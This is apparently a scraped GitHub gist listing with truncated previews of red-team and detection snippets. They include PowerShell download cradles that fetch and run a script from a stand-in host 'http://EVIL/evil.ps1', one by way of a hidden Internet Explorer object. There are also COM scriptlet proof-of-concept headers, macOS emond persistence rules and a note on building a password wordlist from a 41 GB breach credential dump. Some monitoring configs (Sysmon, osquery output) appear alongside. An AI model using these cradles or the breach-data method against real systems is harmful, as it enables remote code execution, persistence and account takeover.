This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wordlist created from original 41G stash via: | |
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
Then, compressed with: | |
7z a breachcompilation.txt.7z breachcompilation.txt | |
Size: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Source = @" | |
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
<plist version="1.0"> | |
<array> | |
<dict> | |
<key>name</key> | |
<string>sample rule</string> | |
<key>enabled</key> | |
<true/> | |
<key>eventTypes</key> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Fswatch command | |
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/ | |
Output when event is triggered | |
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}' | |
osquery.results.log output from event. | |
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
<plist version="1.0"> | |
<array> | |
<dict> | |
<key>name</key> | |
<string>empire rules</string> | |
<key>enabled</key> | |
<true/> | |
<key>eventTypes</key> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Sysmon schemaversion="4fuckyou"> | |
<HashAlgorithms>md5,sha1</HashAlgorithms> | |
<EventFiltering> | |
<ProcessCreate onmatch="include"> | |
</ProcessCreate> | |
<FileCreateTime onmatch="include"> | |
</FileCreateTime> | |
<NetworkConnect onmatch="include"> | |
</NetworkConnect> | |
<ProcessTerminate onmatch="include"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# http://www.bouncycastle.org/csharp/ | |
$BouncyCastlePath = 'Path\To\BouncyCastle.Crypto.dll' | |
$BouncyCastle = Add-Type -Path $BouncyCastlePath -PassThru | |
function Get-TrustedRootCertificateHash { | |
[OutputType([String])] | |
[CmdletBinding()] | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] |
OlderNewer